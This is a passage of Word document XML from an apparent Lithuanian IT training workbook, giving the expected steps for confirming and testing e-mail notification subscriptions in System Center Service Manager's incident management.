      <w:r w:rsidR="70F3C0C8" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">l. </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="70F3C0C8" w:rsidRPr="005A5C28">
        <w:t>ašto pranešimų konfigūracij</w:t>
      </w:r>
      <w:r w:rsidR="0F0894AC" w:rsidRPr="005A5C28">
        <w:t>os patvirtinimas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E83E17" w14:textId="3F998E1F" w:rsidR="70F3C0C8" w:rsidRPr="005A5C28" w:rsidRDefault="70F3C0C8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">Kanalų srityje spustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">l. </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ašto pranešimų kanalas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E54F000" w14:textId="664B8E32" w:rsidR="70F3C0C8" w:rsidRPr="005A5C28" w:rsidRDefault="70F3C0C8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">Užduočių srities dalyje </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">l. </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ašto pranešimų kanalas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Ypatybės,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> kad atidarytumėte dialogo langą </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Konfigūruoti el. </w:t>
      </w:r>
      <w:r w:rsidR="08E47404" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ašto pranešimų kanalą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAE49FA" w14:textId="047C5C7A" w:rsidR="70F3C0C8" w:rsidRPr="005A5C28" w:rsidRDefault="70F3C0C8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Patikrinkite, ar įvesta teisinga konfigūracija.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8D0AE9" w14:textId="65D220E6" w:rsidR="4C1A0010" w:rsidRPr="005A5C28" w:rsidRDefault="4C1A0010" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384D9939" w14:textId="77777777" w:rsidR="00713793" w:rsidRPr="005A5C28" w:rsidRDefault="00713793" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> PRANEŠIMŲ PRENUMERATOS PATVIRTINIMAS IR KONFIGŪRACIJOS PATIKRA (INCIDENTŲ VALDYMO SISTEMOJE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069B07CE" w14:textId="5A686026" w:rsidR="57BFD59D" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ATSAKYMAI / LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="57BFD59D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA680A9" w14:textId="0F9B1C26" w:rsidR="4998CF13" w:rsidRPr="005A5C28" w:rsidRDefault="4998CF13" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D29C166" w14:textId="4DC15E84" w:rsidR="4AC7C30B" w:rsidRPr="005A5C28" w:rsidRDefault="4AC7C30B" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Pranešimų prenumeratos patvirtinimas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556A84C0" w14:textId="062E5E99" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="52A2AE2D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Š</w:t>
      </w:r>
      <w:r w:rsidR="656BCAC8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ias ir kitas susijusias užduotis galite atlikti naudodami „Windows PowerShell“ komandą</w:t>
      </w:r>
      <w:r w:rsidR="7D23AD96" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2493C6CA" w14:textId="09101BA7" w:rsidR="656BCAC8" w:rsidRPr="005A5C28" w:rsidRDefault="656BCAC8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Norėdami patikrinti, ar tinkamai konfigūravote pranešimus, galite </w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>atlikti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>šiuos veiksmus:</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ugeneruokite pakeitimo tipą, kuris suaktyvina anksčiau sukurtą pranešimų prenumeratą. Kai tai padarysite, prenumerata sugeneruos ir išsiųs pranešimą.</w:t>
      </w:r>
      <w:r w:rsidR="0024358D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Pavyzdžiui, sukurkite bandomąjį įvykį, kuris generuoja el. </w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ašto pranešimą. Pranešim</w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>gavėj</w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>as informuojamas</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kad įvykis </w:t>
      </w:r>
      <w:r w:rsidR="00A065D8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>užregistruotas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF5722" w14:textId="6C178AE9" w:rsidR="656BCAC8" w:rsidRPr="005A5C28" w:rsidRDefault="656BCAC8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Jei tikrinate pasikartojančią pranešimų prenumeratą, </w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pal</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>auk</w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, kol bus išsiųstas</w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ankstesnis</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pranešimas. Gav</w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ę</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pranešimą, patikri</w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nkite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">jo </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>konfigūracij</w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0908C2A6" w14:textId="34092844" w:rsidR="656BCAC8" w:rsidRPr="005A5C28" w:rsidRDefault="656BCAC8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Norėdami patikrinti pranešimų konfigūraciją</w:t>
      </w:r>
      <w:r w:rsidR="00166877" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">„Service Manager“ konsolėje spustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Darbo elementai</w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18944F18" w14:textId="2DB5420E" w:rsidR="656BCAC8" w:rsidRPr="005A5C28" w:rsidRDefault="656BCAC8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Darbo elementų srityje išplėskite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Darbo elementai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, išplėskite </w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Įvykių valdymas</w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir spustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Visi atidaryti įvykiai</w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573E6D31" w14:textId="6363C10B" w:rsidR="656BCAC8" w:rsidRPr="005A5C28" w:rsidRDefault="656BCAC8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Užduočių srities dalyje </w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Incidentų valdymas</w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> spustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Sukurti incidentą</w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3838C822" w14:textId="63642B41" w:rsidR="656BCAC8" w:rsidRPr="005A5C28" w:rsidRDefault="656BCAC8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Formoje „Incidento numeris naujas“ įveskite reikiamą informaciją langeliuose „Paveiktas vartotojas“, „Pavadinimas“, „Klasifikacijos kategorija“, „Poveikis“ ir „Skuba“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A023C0" w14:textId="6E02AD8A" w:rsidR="656BCAC8" w:rsidRPr="005A5C28" w:rsidRDefault="656BCAC8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sąraše </w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Klasifikacijos kategorija</w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pasirinkite </w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">El. </w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ašto problemos</w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir spustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Gerai</w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FBC58C" w14:textId="49A3E123" w:rsidR="656BCAC8" w:rsidRPr="005A5C28" w:rsidRDefault="656BCAC8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Patikrinkite, ar gautas el. </w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ašto pranešimas</w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Jame </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">yra informacija, kurią įvedėte šablone. El. </w:t>
      </w:r>
      <w:r w:rsidR="00E2579F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ašto </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
